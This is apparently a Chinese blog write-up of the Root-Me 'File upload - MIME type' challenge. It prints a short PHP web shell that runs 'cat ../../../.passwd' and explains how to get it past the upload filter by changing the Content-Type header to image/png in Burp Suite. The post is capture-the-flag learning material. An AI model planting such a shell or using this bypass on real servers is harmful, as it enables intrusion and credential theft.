【Root-Me】 File upload - MIME type



这题和【Web-Server : File upload - double extensions】的渗透思路是一样的,区别在于绕过方式。

上传一个文件测试一下,发现这次无法再利用双重后缀绕过了,只能上传图片后缀的文件。

题目提示是使用 MIME type 实现绕过。

那么构造 payloads 文件内容都是一样的,不过因为不能利用后缀绕过,所以文件名保持为 exp.php 即可:

<?php
    // exp.php
    // 假如这个文件上传成功,则可以利用 web 打开这个文件进行解析时进行路径穿越
    $content = shell_exec('cat ../../../.passwd');
    echo "<pre>$content</pre>";
?>

使用 Burp Suite -> Repeater 进行上传,同时要修改 Content-Type 的值为 image/png 即可实现绕过(原值为 application/octet-stream)。

上传成功后刷新 upload 分类页面,找到 exp.php 打开即可获得密码,完成挑战。


答案下载

flag 下载后的 flagzip 的文件需要手动更改后缀为 *.zip,然后解压即可(为了避免直接刷答案)


文章作者: EXP
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !
 上一篇
【Root-Me】 ELF - 0 protection 【Root-Me】 ELF - 0 protection
来源:Root-Me 题型:Cracking 题目:ELF - 0 protection 分数:5 Points 水题,需要知道的是 ELF 是 Linux 下的一种可执行的二进制文件(类比 Windows 的 exe)。 开始挑战后
2019-10-03
下一篇 
【Root-Me】 The Roman’s wheel 【Root-Me】 The Roman’s wheel
来源:Root-Me 题型:Programming 题目:The Roman’s wheel 分数:10 Points 水题三连,与 Go back to college 、Encoded string 一模一样的解题方法,只是跟
2019-09-22
  目录